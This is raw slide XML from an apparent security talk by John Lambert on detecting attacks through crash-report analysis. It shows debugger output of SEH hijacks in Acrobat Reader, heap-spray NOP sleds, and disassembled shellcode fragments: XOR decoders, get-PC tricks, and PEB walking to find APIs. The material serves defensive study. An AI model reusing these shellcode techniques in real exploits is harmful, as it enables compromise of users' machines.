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sldIdLst>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="261" r:id="rId4"/>
    <p:sldId id="262" r:id="rId5"/>
    <p:sldId id="263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51" r:id="rId31"/>
    <p:sldId id="452" r:id="rId32"/>
    <p:sldId id="458" r:id="rId33"/>
    <p:sldId id="477" r:id="rId34"/>
    <p:sldId id="478" r:id="rId35"/>
    <p:sldId id="469" r:id="rId36"/>
    <p:sldId id="470" r:id="rId37"/>
    <p:sldId id="463" r:id="rId38"/>
    <p:sldId id="464" r:id="rId39"/>
    <p:sldId id="465" r:id="rId40"/>
    <p:sldId id="466" r:id="rId41"/>
    <p:sldId id="467" r:id="rId42"/>
    <p:sldId id="468" r:id="rId43"/>
    <p:sldId id="509" r:id="rId44"/>
    <p:sldId id="498" r:id="rId45"/>
    <p:sldId id="499" r:id="rId46"/>
    <p:sldId id="512" r:id="rId47"/>
    <p:sldId id="533" r:id="rId48"/>
    <p:sldId id="503" r:id="rId49"/>
    <p:sldId id="506" r:id="rId50"/>
    <p:sldId id="1842" r:id="rId51"/>
    <p:sldId id="1844" r:id="rId52"/>
    <p:sldId id="264" r:id="rId53"/>
    <p:sldId id="1845" r:id="rId54"/>
    <p:sldId id="1846" r:id="rId55"/>
    <p:sldId id="52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110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48AA-037B-4433-91F0-C8C5EF021A4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1ECC6-D961-45A2-A0E7-C6BC520C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1965-8645-4509-B2DB-8BA2885C565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1965-8645-4509-B2DB-8BA2885C565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3601F-DEBF-48C8-876F-5ACA246D86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067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E099-20E9-4F63-9030-8657520294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3E099-20E9-4F63-9030-8657520294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348-60D2-416C-8C07-82513832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04FC0-E107-4771-B52B-6A7715F7B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3B28-2D9D-470D-AC2E-8AA14EF3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A966-A24F-4D7C-BC4F-99269372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67365-456F-4041-82C4-F6854FFE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9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240-9CA1-4296-9C15-F8EAE307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AF2A0-AE6C-4DA1-AEE5-D9940701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1B1D-CD04-40FB-A34F-7F95A9B0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944-A55B-4A9C-958F-A7E23D51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8F7F-AAF2-479C-B8CC-8C644095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B6108-3D4C-4F1F-9243-AA4E5E72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72EF4-9844-49F9-A2D7-16982CB2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96FC-B6F8-439C-87B8-198EB05E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B0BB-49AB-46A4-BB8A-F029DE93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6388-160C-4EAC-BFFE-3E0323C5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3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1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3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803C-A4A7-4F12-AFAB-B8CA6064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439B-42F3-469E-8FCC-F856A34D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134B-848B-40E0-B06A-DBA206DA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5A49-5835-400C-AFAA-30C867BF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1A8BB-B369-4936-9838-7BBF0FD2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9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2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7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5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702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31F-A2DD-4180-8C6A-05EE07D5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B62CC-7D94-49CE-A94C-CB45F458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2EC2-CF84-47E1-A83B-A66AB4F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7A16-470E-446E-8392-77F2C4FA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2BCE-3EA6-4B05-A61E-BA4E810D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95D2-BE32-4A87-A409-B85AF486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D1C1-20C2-47C9-9B47-47E7D69D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C5EFC-BAB1-447A-9C04-98627AE9D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4B6BD-1108-40C6-A391-DBAD1C80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4EBEB-2D1E-4A13-B29A-EA85257A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795C-1126-49B2-A502-798C3663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C6C8-91F2-41FE-8E4E-6EDD9BD8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3A5D-F278-4F24-B8E6-923C12EF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9790-7A50-4E0B-9847-C2A3DC7C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2F0E8-0A70-4C86-8698-F023D5338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4EBCA-79ED-4B0B-86F3-5CDD90A0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2D93E-7C2B-4A87-87FE-44FED33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20D5-1D3B-45FE-8B05-EEB9D02E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22245-2A13-440F-B1B3-15B578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16C6-D4BF-47C5-BD33-06BA8476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2CC69-11D4-4FD2-ADF6-151F081E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89AC-A8DC-4B12-A044-01EA106D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04A3C-1027-4E8C-90A2-1A23157E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44A5E-3759-48F1-97F4-0A9A408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AE963-3957-45A4-961B-9896DA53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72F9E-9251-4E40-AD17-82CC74E6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83FC-839C-422E-89DF-D0948A51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AB1F-8034-46D4-BEB7-561F257D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5D22-6AC5-40B6-9A6D-FC3930D1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18262-B473-4121-8BA2-D7F9FBC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6114-87AE-4CC4-8D9A-F850585A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4D59-3A9E-4229-97F0-887E6DCC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C4E-C388-4FFB-91E0-D49CDC93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A3214-EFBD-40F6-9B6F-BE7E0339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BB7A-FADA-4A71-A0B2-CFB3B32B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75B6-3A2A-4557-871B-43B67F77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22CC-37D4-4DCD-9CAE-F13BA3F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BDA6-A34B-4E08-8846-19F559B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816A3-3A45-469D-8992-192FDCA1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923A-0081-4DD5-8886-C02D5313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67B2-9554-4570-8826-B4FA46915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A876-F840-4F49-B821-E9C1AAA646C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2D72-C64D-4AF2-A865-F0DE43F89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C2C8-FB4D-4831-ADBA-7309E45B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43EE-8AEF-467A-A7AD-A7D8B7A88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DE74-500D-48CB-B711-BE07161649F7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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F4B9-F682-465F-A1A5-FFD6B135E4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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.gif"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://images.google.com/imgres?imgurl=http://www.bubbaswholesale.com/images/bullet.jpg&amp;imgrefurl=http://www.bubbaswholesale.com/bulletholes.htm&amp;h=150&amp;w=144&amp;sz=5&amp;tbnid=L2UTrtkUN2EJ:&amp;tbnh=90&amp;tbnw=86&amp;hl=en&amp;start=18&amp;prev=/images?q=bullet+hole&amp;svnum=10&amp;hl=en&amp;lr=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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.gif"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://images.google.com/imgres?imgurl=http://www.bubbaswholesale.com/images/bullet.jpg&amp;imgrefurl=http://www.bubbaswholesale.com/bulletholes.htm&amp;h=150&amp;w=144&amp;sz=5&amp;tbnid=L2UTrtkUN2EJ:&amp;tbnh=90&amp;tbnw=86&amp;hl=en&amp;start=18&amp;prev=/images?q=bullet+hole&amp;svnum=10&amp;hl=en&amp;lr=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gif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wm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Error Reporting to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect Network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86200"/>
            <a:ext cx="7391400" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>John Lambert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSEC Security Science Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>April 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057400" y="1295400"/>
            <a:ext cx="23622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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEH Hijack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3393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25908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38400" y="34061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36576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45491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0xfffffff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38400" y="48006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8" name="Arc 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2209800" y="2438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H="1">
            <a:off x="2209800" y="3581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400" y="2971800"/>
            <a:ext cx="1600200" cy="25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48400" y="4648200"/>
            <a:ext cx="26670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_except_handler3()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kernel32.dll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14800" y="49530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114800" y="2743200"/>
            <a:ext cx="205740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97180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8400" y="322326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38400" y="348234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373380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38400" y="398526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pic>
        <p:nvPicPr>
          <p:cNvPr id="36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162628"/>
            <a:ext cx="1600200" cy="1066800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2057400" y="762000"/>
            <a:ext cx="2362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TEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       FS:0                          </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Arc 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2057399" y="1219201"/>
            <a:ext cx="685800" cy="1195137"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 55723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057400" y="1295400"/>
            <a:ext cx="23622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45491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0xfffffff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38400" y="48006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9" name="Arc 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2209800" y="3581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400" y="2971800"/>
            <a:ext cx="1600200" cy="25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48400" y="4648200"/>
            <a:ext cx="26670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_except_handler3()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kernel32.dll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14800" y="49530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114800" y="2743200"/>
            <a:ext cx="205740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97180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38400" y="322326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38400" y="348234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373380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38400" y="3985260"/>
            <a:ext cx="1600200" cy="2559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0x0c0c0c0c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05400" y="914401"/>
            <a:ext cx="5410200" cy="3323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</a:rPr>
              <a:t>0c0c0c0c 90              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0c0c0c0d 90              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop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… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0c23fe2b 43              inc     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx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0c23fe2c 43              inc     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx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0c23fe2d 43              inc     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx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0c23fe2e eb0f            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     0c23fe3f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0c23fe30 5b              pop     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx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0c23fe31 33c9            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin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</a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx,ecx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0c23fe33 66b98001        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     cx,180h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0c23fe37 8033ef          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>],0EFh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0c23fe3a 43              inc     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx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0c23fe3b e2fa            loop    0c23fe37</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0c23fe3d eb05            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     0c23fe44</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0c23fe3f e8ecffffff      call    0c23fe30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238500" y="1866900"/>
            <a:ext cx="25908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057400" y="762000"/>
            <a:ext cx="2362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TEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       FS:0                          </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Arc 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2057399" y="1219201"/>
            <a:ext cx="685800" cy="1195137"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 55723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38400" y="23393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25908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6" name="Arc 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2209800" y="2438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xplosion 1 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="10668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Explosion 1 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="22860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573000" y="2209801"/>
            <a:ext cx="65532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0494913805.cab (AcroRd32.exe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0:000&gt; !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b450: kernel32!_except_handler4+0 (779ee289)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b4d8: kernel32!_except_handler4+0 (779ee289)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b578: kernel32!_except_handler4+0 (779ee289)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012dbc0: 0c0c0c0c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invalid exception stack at 0c0c0c0c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29200" y="0"/>
            <a:ext cx="56388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SEH Handler Points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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Nopsled</a:t>
            </a:r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+ Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27926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04 0.00046 -0.00208 0.00092 -0.00312 0.00138 C -0.00451 0.00185 -0.0059 0.00231 -0.00729 0.00277 C -0.00937 0.0037 -0.01354 0.00555 -0.01354 0.00555 C -0.01614 0.01597 -0.01232 0.00347 -0.0177 0.0125 C -0.0184 0.01365 -0.01823 0.01527 -0.01875 0.01666 C -0.0217 0.02476 -0.0243 0.03333 -0.02708 0.04166 C -0.02847 0.0456 -0.02916 0.05 -0.0302 0.05416 C -0.0309 0.05694 -0.03229 0.0625 -0.03229 0.0625 C -0.03333 0.08935 -0.03489 0.12453 -0.02291 0.14861 C -0.01979 0.15486 -0.01284 0.16064 -0.00729 0.1625 C -0.00555 0.16296 -0.00382 0.16319 -0.00208 0.16388 C 0 0.16458 0.00417 0.16666 0.00417 0.16666 C 0.0066 0.17152 0.00504 0.17083 0.00834 0.17083 " pathEditMode="relative" ptsTypes="fffffffffffff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9 0.00255 -0.00034 -0.00046 -0.00625 0.00555 C -0.00816 0.00764 -0.0125 0.01111 -0.0125 0.01111 C -0.01788 0.03287 -0.01979 0.05555 -0.02395 0.07778 C -0.02326 0.10162 -0.02222 0.12222 -0.01666 0.14444 C -0.01545 0.14907 -0.01389 0.15926 -0.01145 0.1625 C -0.00937 0.16528 -0.00625 0.16667 -0.00416 0.16944 " pathEditMode="relative" ptsTypes="ffffff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3.4104E-6 L -0.88333 -0.00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32" grpId="0" animBg="1"/>
      <p:bldP spid="53" grpId="0" animBg="1"/>
      <p:bldP spid="53" grpId="1" animBg="1"/>
      <p:bldP spid="55" grpId="0" animBg="1"/>
      <p:bldP spid="55" grpId="1" animBg="1"/>
      <p:bldP spid="39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143001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0:017&gt; u 0x0150f60b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0150f60b eb10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0150f61d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0150f60d 5a              pop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edx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0150f60e 4a  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dec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edx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0150f60f 33c9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ecx,ecx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0150f611 66b93c01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mov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cx,13Ch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0150f615 80340a99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xor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byte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[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edx+ecx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],99h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0150f619 e2fa            loop    0150f615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0150f61b eb05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0150f622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0150f61d e8ebffffff      call    0150f60d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0150f622 704c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jo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 0150f670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0150f624 99  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cdq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0150f625 99  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cdq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0150f626 99         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cdq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0150f627 c3              ret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0150f628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fd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         std</a:t>
            </a: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0150f629 38a999999912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cmp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 byte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ptr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[ecx+12999999h],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ch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8927140" y="1143000"/>
            <a:ext cx="174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alibri"/>
              </a:rPr>
              <a:t>0343830437.cab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604511" y="5293669"/>
            <a:ext cx="251460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rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Encoded Payload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1752600"/>
            <a:ext cx="8382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0150f60d 5a              pop     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edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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3886200"/>
            <a:ext cx="86106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0150f61d e8ebffffff      call    0150f60d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447800"/>
            <a:ext cx="8382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0150f60b eb10            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jmp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     0150f61d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8077200" y="4267200"/>
            <a:ext cx="5334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10601" y="3861138"/>
            <a:ext cx="18668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sz="20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Pushes return address on the stack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8001000" y="1905000"/>
            <a:ext cx="533400" cy="2286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4401" y="1498938"/>
            <a:ext cx="186685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0"/>
            <a:r>
              <a:rPr lang="en-US" sz="20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Pops return address into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1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edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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rtl="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Where Am I? (“call to pop”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Curved Left Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7924800" y="1828800"/>
            <a:ext cx="457200" cy="2362200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81200" y="4191000"/>
            <a:ext cx="1295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4267200"/>
            <a:ext cx="8382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52650" y="4286250"/>
            <a:ext cx="8324850" cy="24160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0150f622 e9d5000000 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   0150f6fc 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0150f627 5a             pop   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edx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0150f628 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>64a130000000   mov    eax,dword ptr fs:[0000030h]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endParaRPr lang="en-US" sz="11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8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6" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="1" animBg="1"/>
      <p:bldP spid="12" grpId="2" animBg="1"/>
      <p:bldP spid="1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1676400"/>
            <a:ext cx="7543800" cy="5016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0:007&gt; u 0016d84b L 20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0016d84b d9ee            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fldz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0016d84d d97424f4        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fnstenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [esp-0Ch]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0016d851 5b              pop     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"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0016d852 81731376d2ab1f  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [ebx+13h],1FABD276h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0016d859 83ebfc          sub     ebx,0FFFFFFFCh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0016d85c e2f4            loop    0016d852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0016d85e 8ab840529e2b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mov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bh,byte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ptr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[eax+2B9E5240h]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0016d864 54              push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esp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0016d865 e089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loopne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0016d7f0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0016d867 b220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mov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dl,20h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0016d869 7352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jae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0016d8bd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0016d86b f620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mul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al,byte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ptr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[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eax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0016d86d 5a              pop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edx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0016d86e 4a  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dec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edx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0016d86f 59              pop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ecx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0016d870 d7  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xlat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byte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ptr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[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ebx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0016d871 1a0e    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sbb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cl,byte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ptr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[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esi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0016d873 d3449439   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rol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dword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ptr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 [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esp+edx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*4+39h],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1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cl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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934200" y="1371600"/>
            <a:ext cx="3048000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -79581"/>
              <a:gd name="adj2" fmla="val 34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Any floating point instruction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Where Am I? (“Noir”)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7239000" y="1295400"/>
            <a:ext cx="3048000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45407"/>
              <a:gd name="adj2" fmla="val 746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Store floating point context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05000" y="1981200"/>
            <a:ext cx="3048000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 58213"/>
              <a:gd name="adj2" fmla="val 785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XOR decode loop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334001" y="2779295"/>
            <a:ext cx="45719" cy="609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8" grpId="0" animBg="1"/>
      <p:bldP spid="8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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locate and Call APIs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094125"/>
            <a:ext cx="1828800" cy="1981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779925"/>
            <a:ext cx="18288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0x30: _PEB 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0" y="1094125"/>
            <a:ext cx="2438400" cy="1981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1779925"/>
            <a:ext cx="24384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0xC: _PEB_LDR_DATA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124202"/>
            <a:ext cx="6096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eax,dword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fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:[00000030h]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eax,dword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[eax+0Ch]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esi,dword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[eax+1Ch]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lods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 err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi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eax,dword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[eax+8]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ebx,eax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esi,dword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[ebx+3Ch]</a:t>
